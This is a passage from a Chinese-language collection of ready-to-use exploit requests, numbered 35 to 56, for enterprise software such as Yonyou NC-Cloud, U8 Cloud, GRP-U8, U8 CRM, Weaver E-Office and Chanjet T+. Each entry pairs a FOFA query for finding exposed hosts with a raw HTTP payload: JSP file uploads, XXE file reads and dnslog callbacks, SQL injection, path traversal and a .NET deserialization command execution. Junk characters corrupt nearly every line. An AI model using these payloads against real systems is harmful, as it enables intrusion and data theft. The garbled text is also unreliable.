4 m1 b; \$ d( o9 X4 D* D# dFOFA：app="用友-NC-Cloud"+ h- Z" J  R; `7 i0 o& J
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
8 U' }! q5 N. u& F2 GHost: 203.25.218.166:8888
/ N8 j! _- u  T8 SUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info2 }/ r5 h: T  y$ i9 h# J& M; \
Accept-Encoding: gzip, deflate+ M4 \) N" Q1 ~' p' y
Accept: */*) J" C% W0 E6 a( M
Connection: close
+ b6 s6 ?. _( R$ h$ w) j; baccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
; m  e! `! X6 X+ s; J: u1 aContent-Length: 190
. s5 }# m8 j, Z4 MContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0( j) ?. x4 n: G+ Z3 b0 h( n

: ?! C' x, E$ K7 r4 O. |( X--fd28cb44e829ed1c197ec3bc71748df0
5 y! ~8 d4 d7 d) M" x, hContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"" u3 X; g5 ~& b

! D0 G( A8 C- L7 O<%out.println(1111*1111);%>
/ O0 x) t: E9 ~--fd28cb44e829ed1c197ec3bc71748df0--
2 X0 D# j* ?; \9 P1 r7 p! G' ^2 S% w

( M7 Q$ `9 W: P% {36. 用友NC-Cloud soapFormat XXE' q. {1 m2 F7 |: G
FOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"" P5 |- |( f- w
POST /uapws/soapFormat.ajax HTTP/1.1
5 F8 @5 A/ [% G! f* I4 }7 h. JHost: 192.168.40.130:8989
3 n/ }# h4 E% O2 U2 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.03 |& U6 s. R  j
Content-Length: 263: s+ O% N( y1 R* a" l5 L  J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) y8 M, [2 f& z  X+ ?9 G% _Accept-Encoding: gzip, deflate8 D$ l6 G2 p9 Y* C0 v" j8 B4 ^6 I& j' @5 |
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: p4 r! @7 [! Z' N- j/ i7 SConnection: close
& e, M/ A1 d9 X3 p6 i  cContent-Type: application/x-www-form-urlencoded: G" Z9 l  M0 |1 R  u
Upgrade-Insecure-Requests: 17 K- l& q- b3 R2 R7 b' P9 l

" n- S  e) K& \+ k7 Smsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
1 O! P6 j4 j& n
) e* a, E6 [2 B) @: t
2 N& f0 ~/ ]/ c( f" T, ~37. 用友NC-Cloud IUpdateService XXE
0 S+ {, j; p/ ]+ xFOFA：body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"; H5 `1 k4 Y. a2 L9 I: D$ S
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.15 y  ~1 P2 s3 @  s
Host: 192.168.40.130:8989  \0 d- `7 ~) n0 d1 _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' q4 `, u4 a/ o4 ^/ @Content-Length: 421
3 o# j) `8 q* ^8 I! lAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
& [8 @$ B) w; W: e7 Z0 E) DAccept-Encoding: gzip, deflate0 @5 ^) D2 y: p' o- ]! T. |
Accept-Language: zh-CN,zh;q=0.9
& W9 ^+ V! G% |Connection: close' r4 Q, v8 q- a* I
Content-Type: text/xml;charset=UTF-8
8 Y2 s4 d7 Q" i: x' p" ^! E( m: w- DSOAPAction: urn:getResult* Q& @0 H3 V9 {0 n+ m+ K+ D
Upgrade-Insecure-Requests: 1
5 p4 R2 h6 c  p' T5 p9 q9 R
0 V1 N$ M/ n% }, [8 ^<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
' H: h* ~* S# i/ I<soapenv:Header/>+ O; v4 ~; w9 w- Y2 E( H
<soapenv:Body>
1 ~, }, R6 g$ N0 ~3 T1 a) ]8 T<iup:getResult>3 \- g4 l% }4 u1 [: G

9 h8 H1 {/ v+ V) @* P  ^<iup:string><![CDATA[+ y4 C' o# s# \* Y& |. w
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
- w/ M% o5 c$ `# }4 a<xxx/>]]></iup:string>2 n* U8 b2 y: ]! l* ~5 M+ _5 k
</iup:getResult>+ Z! A$ G/ n+ c, n+ T) B% C3 W
</soapenv:Body>
9 M2 H2 n, d7 ^8 A5 `. l4 X% ~3 x</soapenv:Envelope>
) o- C# Y4 J  n# E% e
$ o) s* q! `% S+ O) f" V, _) R2 j
# [1 {3 s6 c% T, a- \  g) q* o! ]. A' R6 d: Y
38. 用友U8 Cloud smartweb2.RPC.d XXE
7 X( X& c4 J" Q& nFOFA：app="用友-U8-Cloud"
4 }" ~& m- k. \; YPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
* u0 E9 O6 M! NHost: 192.168.40.131:80883 I5 x/ ?0 t: u5 ?
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
. m; T3 Q1 ?7 q* UContent-Length: 2604 b7 n/ n0 n" A/ p; `& W$ ~
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% ?5 ^" G* a' d6 Y0 z
Accept-Encoding: gzip, deflate) i+ u9 x. O  H, w. O. T
Accept-Language: zh-CN,zh;q=0.9
& l; V! t2 }. \. r& r  W0 e% FConnection: close
0 `1 N6 A) d3 b2 xContent-Type: application/x-www-form-urlencoded$ w: s+ Q( S. e/ M5 M

: z2 S* Z/ x( Z' ?$ @  e4 Z__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>/ [4 O0 {! N7 Z% d5 Q+ N1 E) D

, K9 L! `, C4 i  {" y2 [
$ [" M* E4 n) J0 h, q0 S39. 用友U8 Cloud RegisterServlet SQL注入
" g6 I2 p# B& i0 j, t" wFOFA：title="u8c". L5 o5 b/ c; K; {
POST /servlet/RegisterServlet HTTP/1.1
' q% m' Z0 l4 V1 W1 F1 LHost: 192.168.86.128:8089
- ?  |7 p/ a  JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36' q6 y* a" [9 P! C
Connection: close" ?4 o8 n' Y" |8 n, ~: S& ]
Content-Length: 85
/ k1 Y$ x* Y0 w/ \Accept: */*9 V' U% \' F6 t0 J6 R
Accept-Language: en' B; V  v+ X: p4 K
Content-Type: application/x-www-form-urlencoded1 O; z6 \* x2 x6 t" Y
X-Forwarded-For: 127.0.0.1& G7 q% Z! x; _) K% N& t
Accept-Encoding: gzip* W# |2 K8 a5 c3 ^7 ^$ G' d+ H/ i& U  R
3 ]4 M+ d! I/ s" j/ K) O9 V
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
( s$ \3 u) {' d( G+ I- \& b
& U5 r. _( Q: E
/ f( f( ]5 \# a  n40. 用友U8-Cloud XChangeServlet XXE
2 H/ H* F. j9 V4 s" MFOFA：app="用友-U8-Cloud"
$ w4 |! [8 i7 nPOST /service/XChangeServlet HTTP/1.1/ d. B, r" x5 t9 c
Host: x.x.x.x' k0 y( l1 ~% X+ g! P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36  A3 E) a! }1 |( B6 O: Z
Content-Type: text/xml  j  q" b' u% @# i
Connection: close
" c; B6 U4 f, S% P- ?4 }0 |- ]2 b, c( V' f* H" X* z
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>* P* N+ P# ^3 ]2 {) t& q6 c

' G- g7 v$ D! l  L6 e- T) e- F# z! C
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入# J9 m' z$ c1 j
FOFA：app="用友-U8-Cloud"
- L2 p% _, X5 M+ _GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1: m7 [" D/ x1 B: s2 |
Host:
+ E; A/ ~$ W' lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
/ Q% Y) C5 w  b! EContent-Type: application/json
8 ?( ?0 W& D* |$ ?. v; x* S% rAccept-Encoding: gzip
4 `# Z5 g' n" o; x+ SConnection: close9 B0 }. w. T7 A4 G6 f! t- r

3 P/ E8 n& v+ l. ]7 c+ i( ?2 ?% z: K
) A9 W2 d7 W" Q  x' W( x42. 用友GRP-U8 SmartUpload01 文件上传& |, I+ w) [7 ~9 g! R
FOFA：app="用友-GRP-U8", y7 A  `; z  J% u8 P
POST /u8qx/SmartUpload01.jsp HTTP/1.1
: t% E. w, Z9 N/ CHost: x.x.x.x; l  h0 L* V  X- U; A" O  b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt$ _) Z% [) J8 _+ D4 [1 a  k* @
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
. i* u6 L1 b2 X+ e
3 v' r9 r% K# K$ xPAYLOAD
9 a! K; r6 {1 J+ L( J, [
8 _  z" r6 h( |2 Y0 P) X% U7 ]
0 @: D7 Z1 s/ F8 Jhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml9 B1 j1 D- ^; v; I6 M- E

' e( }( M8 D8 m43. 用友GRP-U8 userInfoWeb SQL注入致RCE
2 E/ D! J. y" ?8 eFOFA：app="用友-GRP-U8"
# d+ c  m, ?$ U3 TPOST /services/userInfoWeb HTTP/1.1
0 o2 k  D9 i, j; e& {0 r- J2 KHost: your-ip
& ?0 [7 S% b- LUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36; p% C5 `8 y; x& C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ {# d8 @( r- _% a$ U& S+ ~Accept-Encoding: gzip, deflate
! L6 M3 _! T: q  n$ R% JAccept-Language: zh-CN,zh;q=0.9' U2 s0 n, s- T& _: B2 V
Connection: close
# _; m8 `6 c) u9 J, t, M5 aSOAPAction:
+ ~9 H" ?4 M/ H+ N. EContent-Type: text/xml;charset=UTF-8" F' y& V5 L+ J1 ?9 u4 s& U
- u/ |0 O, |. A" M6 y
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com"># r/ g  c2 S, y7 Q4 M  `
<soapenv:Header/>
5 ]8 J+ N) Z) m2 A+ k% W5 h7 m, V <soapenv:Body>* _/ N# A' O' F0 z
   <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
" _8 ^3 T# {$ _& ~, O$ U4 G       <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
5 r; C$ k2 g' {. F    </ser:getUserNameById>
- b/ @& X4 }1 K </soapenv:Body>
. J: {: I" I, n5 @% A2 n' Y# r* u</soapenv:Envelope>8 _3 |( \9 D$ D- i! c' E) q( @

" O8 r1 f5 R5 c; Q# C* ?5 Z1 q( `$ H* Q
44. 用友GRP-U8 bx_dj_check.jsp SQL注入+ C% H1 M- l8 I& t% \
FOFA:app="用友-GRP-U8"
) D- M9 ], y7 ZGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1( D4 B0 R  V; f2 o. C3 p
Host: your-ip
' w! o8 u% J7 ?! ~6 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.361 N" y' {: r0 ^" ]4 A/ D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 B/ G  ?, |$ Q$ e1 o1 [( y
Accept-Encoding: gzip, deflate3 h" w0 [2 t+ V9 j- Y7 P
Accept-Language: zh-CN,zh;q=0.9
8 o, _7 Z* E$ g$ n) E" a& j% v' ?$ \Connection: close6 A, P4 C" ?7 ^7 P9 E% z
. [. e: n- ?4 s# g% {5 p

% K7 {; T9 s( t* m& w$ x4 D45. 用友GRP-U8 ufgovbank XXE
$ Y1 ], s) b5 A. [7 yFOFA：app="用友-GRP-U8"
3 Y$ D9 o( c1 D! B, R1 |9 OPOST /ufgovbank HTTP/1.1
* z) Y1 Y# @# u% {" f+ r% C: lHost: 192.168.40.130:222
' U  `8 w  Q/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+ p, W7 e6 h9 B3 TConnection: close
: ]$ i& t  U# iContent-Length: 161
' u1 ]$ c" ]  y% u% @2 ~9 r) k# w- SAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.88 x2 A4 j% [) c6 r  ?6 i) ?9 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& |8 i7 Z! B( f7 x/ l5 A' F
Content-Type: application/x-www-form-urlencoded9 i3 _! j, c: W! P8 V
Accept-Encoding: gzip. h; `! ^2 G& Z( Y9 v' W6 G
7 G) R4 [+ a8 @$ o$ Z. T  s) H
reqData=<?xml version="1.0"?>
9 |* x: {2 U( G9 f  L<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest* Q5 Y# K2 U; Z, ~- S
/ j' o! `9 {6 ~; p- @
3 [1 C$ ]" H0 Z
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
) t% w* q& b7 P. m3 i# p! fFOFA：app="用友-GRP-U8", [" g. D# A1 k
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1- l" ]; l- M/ U$ c' g
Host: your-ip3 Q$ M+ d  L4 H/ v7 E; G- Z
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.363 @2 j1 ^, i) T$ N1 m  s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% ^; t: e/ e& C. M% z, p8 O% \Accept-Encoding: gzip, deflate* _6 h* \- X+ x7 e' P" p1 _
Accept-Language: zh-CN,zh;q=0.91 p- W+ I0 r& l: Q/ _0 c
Connection: close) T5 |9 q4 f' E

# R! l5 D% h$ Z2 ]" P; H0 s- w. y1 v2 ?; l0 e  P& V; _+ t
47. 用友GRP A++Cloud 政府财务云任意文件读取2 p* }' R9 U& x2 O  l& D. Q2 X
FOFA：body="/pf/portal/login/css/fonts/style.css"
7 S: h4 j" R- P+ }9 I1 h4 HGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
- r8 K( j. E/ T% W/ LHost: x.x.x.x
5 C. E( D; a# @& dCache-Control: max-age=01 e! W) A# C+ Z: a; `9 B! V
Upgrade-Insecure-Requests: 15 G2 `: [% F. b/ k0 u! ]1 n- `$ Y7 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( L# g8 R3 e, u3 G) b- G/ m2 z2 C5 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
- u6 u/ d) n0 x6 D3 nAccept-Encoding: gzip, deflate, br
/ J7 P$ @1 ~9 H& ~: ?Accept-Language: zh-CN,zh;q=0.9
! E9 Y: d. H4 R0 R5 A' EIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT- [9 e" _, T& I0 }
Connection: close
1 v) T2 |) \" d( W- ~7 E5 z' L/ U; _5 A. \2 `( {4 Y
& |2 P0 F0 F. a$ i; @
3 g. E4 N8 g1 m; V" ^) T3 y
48. 用友U8 CRM swfupload 任意文件上传
3 c* k' S1 `! d1 r( w( m/ jFOFA：title="用友U8CRM"
( e, z1 ?% N. d, v6 j, MPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
) i& x/ Q: K# I) D, ~' T! Y; @Host: your-ip
2 l( K% C$ P* ?! H3 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.03 ^  U) g( k) K- N8 ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
0 w8 O; ?8 x7 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. k3 X5 s* P8 K( |! tAccept-Encoding: gzip, deflate
) g: z6 ^& W5 q  OContent-Type: multipart/form-data;boundary=----2695209672394068716424300668551 }9 k0 O8 Z6 Z
------269520967239406871642430066855
& h! T* [2 E9 ^7 UContent-Disposition: form-data; name="file"; filename="s.php"" F( F% j3 j3 t
1231
9 x& U7 v* b, n8 G. P! W( ]& h0 nContent-Type: application/octet-stream
* D: y, m+ \7 C% K$ @. G------269520967239406871642430066855+ J7 b2 K( G. Y' ]. }
Content-Disposition: form-data; name="upload"4 `; g& A. M2 b. D6 J0 N
upload
) x! e2 s6 x/ \8 w: w4 I------269520967239406871642430066855--
" N$ s' L% ?) i6 H) A
  m) m- Z7 S: m1 g
0 f& j/ E  r- T/ @9 j49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. B- s& `" n# I2 dFOFA：body="用友U8CRM"& W: Z  f  ~. [! z2 x0 p; [
7 G7 g! K" p- d7 M" ]5 \0 a6 u: B
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
" H6 d3 o  x9 b4 [. {$ yHost: x.x.x.x
: j6 m) B/ d5 W' tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 O7 S' n* ]$ u: I' LContent-Length: 329& K) E. w6 j( @0 a) `6 Q! G: G
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 i; g7 s, P4 f  H% p7 p* m: i
Accept-Encoding: gzip, deflate/ v6 p; s  A' @, b9 s5 l8 Y) K3 o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% u8 r1 }' e8 ]2 nConnection: close
/ H, V: Z2 @) K6 b( lContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w6 Z3 q) e3 Y' X
1 h( N& e& x9 E" F+ E+ m) D9 d2 n
-----------------------------vvv3wdayqv3yppdxvn3w5 w6 h5 g, O) h' h- D
Content-Disposition: form-data; name="file"; filename="%s.php "
1 x' Y6 d/ k  b+ D& xContent-Type: application/octet-stream; `) B7 E# m* P: P( F! Z9 g
5 U& A* B  t1 _( s6 v
wersqqmlumloqa
" J7 O: Y; z( l-----------------------------vvv3wdayqv3yppdxvn3w
9 t) F- O) o. wContent-Disposition: form-data; name="upload"
5 X  G% m# E9 g. }
' E, G0 h6 w. n: b! a, `upload
) W8 C, u* e* [0 `% b) C8 W-----------------------------vvv3wdayqv3yppdxvn3w--& c0 F- K' z6 Z; e4 `
0 @* Z6 i' X+ k' {( I
) g- u5 G: S2 m+ A+ }* j8 @
http://x.x.x.x/tmpfile/updB3CB.tmp.php3 d+ M; G; c7 ]* j3 ~% ?  ~+ V
& S2 F  G. \1 x0 `+ h, h# O# q3 ]
50. QDocs Smart School 6.4.1 filterRecords SQL注入/ [6 H" O/ ]: `3 R, u7 r
FOFA：body="close closebtnmodal"# K0 ^' T+ Y1 G$ L9 \8 D
POST /course/filterRecords/ HTTP/1.1" a* y3 t2 j2 n
Host: x.x.x.x
/ M" M: W8 W1 m7 @0 E5 I4 r) j0 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2 m: R) |2 Q- I* B! B% `+ |Connection: close
7 ]& @: [/ K  Q/ m7 e0 n8 L7 XContent-Length: 224
. Q- t1 L7 `1 ^2 ZAccept: */*
) s/ ]. ?% R; iAccept-Language: en
3 b' |, h2 w, b5 p0 K5 _! n4 KContent-Type: application/x-www-form-urlencoded
. T$ x# A- J7 n* p) k- {7 gAccept-Encoding: gzip9 C1 H# b) i. x( G& @
1 l9 C# c2 m3 r, N! w0 X
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1  V) b1 W4 @1 G$ O, |' g# B) o, S
% l3 v( m7 i' q. w

# u. g+ m& ~9 `, a! {5 ^- \; C* e1 `51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入$ s3 j' G* S" L, V! r# J
FOFA：app="云时空社会化商业ERP系统"4 z, `( j) j% j' M. x  k
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
0 D, i+ o% D5 |8 @; HHost: your-ip  J) \$ {/ c: v+ H# c/ k! T& W
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36$ B7 [: ]1 @. b- P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.96 r$ |, F! Q$ @; ?; i
Accept-Encoding: gzip, deflate) x& G  k8 g4 Z9 \
Accept-Language: zh-CN,zh;q=0.9
; r6 [& L+ ]4 B  h2 nConnection: close1 a" Q* }, T3 b1 p. X4 H$ @
( k. }- D8 K5 O/ O

" d* p9 n9 V: m3 n' l" U( Q52. 泛微E-Office json_common.php sql注入
+ V9 N4 t' G7 V5 ZFOFA：app="泛微-EOffice". n# r6 {% X0 ~- p
POST /building/json_common.php HTTP/1.12 t7 P' o  _; F7 G. Z* u7 F3 A
Host: 192.168.86.128:80974 F' n: R) W" t+ K+ O
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36$ o8 u7 R" G" w" h  g+ M
Connection: close
: K- \1 ]$ ]/ w2 T* a$ C& sContent-Length: 874 i& N8 s! g# H' v* K# e, c* d0 \
Accept: */*) V- L  q# n& \1 z+ i
Accept-Language: en1 R2 ^! E$ _0 Q
Content-Type: application/x-www-form-urlencoded4 j2 V2 \( F, ^8 I8 \! O0 p% m
Accept-Encoding: gzip( |, I- A5 _# C' t$ m8 Y: R4 h9 X* P0 ~
) G7 ~+ S4 F( M& U  y/ P
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 @2 h- x. V7 O7 r8 w. F  k
& d$ W& E( |; g  K! ^0 C* G. U8 @5 f
, C2 k" k/ G1 o/ q0 M, Y# z# O1 }, G1 |
53. 迪普 DPTech VPN Service 任意文件上传
* i+ N3 |2 I/ L* y3 n7 sFOFA：app="DPtech-SSLVPN"# a: d" r/ ^1 R
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd0 {$ s* |* J9 P3 Z

, Q; a- [1 D! A3 c
# z; q; L( g( k54. 畅捷通T+ getstorewarehousebystore 远程代码执行
. X( l! K$ g2 `0 E; i+ T8 ZFOFA：app="畅捷通-TPlus". I& D' b% h, }. C* \5 B
第一步，向目标发送数据包，执行命令，将指定字符串写入指定文件
% e3 d& W5 |1 C9 e9 r"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"  H2 S0 U9 Q4 {6 Q- x% [$ ~# [
" f  \# |; J$ a! v% f7 Z1 g
" b. ]& q) {) q
完整数据包
- P' R/ N( S& tPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1& x2 d& Y) ~4 w4 T" D
Host: x.x.x.x
: Y- o9 h4 k' v& V* d5 w3 \! nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
3 V$ Z) Y/ n) `/ IContent-Length: 593
; f) r. O& U% ^
/ g7 ]& p( [- B; r! E1 u/ y{& S: J' `7 r  [, V" C: X' r
"storeID":{& N  Y6 @" Z) P+ N
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",; u( M( l6 o( p* y% ]6 b
"MethodName":"Start",
3 m- }! S$ N! t. r. P  "ObjectInstance":{. J1 @. d5 O" i! o
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 y3 G& k6 R( L0 y$ i5 U "StartInfo":{7 ]& C1 k0 g0 ~, b
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
2 O& ?2 v# n& E$ Y9 J "FileName":"cmd",6 g9 N6 b! r6 N& s( e2 q  w
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
7 H! h9 X- y+ A }
- I. Y( E% j6 \9 c% _  }
8 g4 k0 r0 v. N: L  }
* K; {) f% v8 ?}
4 J" \& |) N, `  y; @: i# i% _3 a$ w/ v8 Y
" ^% U* |6 X6 Y* i: ^) ~: }; u
第二步，访问如下url' b1 O! U; a1 L) \" V+ A7 ~* O
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt+ L! b" E6 O' d+ U% D! F1 Z2 g

( C7 U8 ?# H0 c) p# W
4 x/ L# Z' h+ A+ B55. 畅捷通T+ getdecallusers信息泄露
7 p$ n6 A/ z" Y) Z- `+ ~FOFA：app="畅捷通-TPlus"
7 @* N" q- v1 Y$ P第一步，通过
: v" v( Z( _. d5 m) s5 D/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
; ?. H- i. s4 |: L  ?* `2 D第二步，利用获取到的Cookie请求$ L7 `( Y6 M) e
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
: _3 u$ c* l" E6 x4 w8 H+ M
3 ]; R4 r' R  U( R; ~3 i" p56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
, ~: n; ]. w% \/ O6 e0 Z* W# k( R9 ]2 mFOFA: app="畅捷通-TPlus"2 N; a# t% z5 m  u: @2 C9 X, l
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1# o/ b2 N! }8 y" P5 n' `
Host: x.x.x.x8 c2 P+ o1 j( G0 X% x
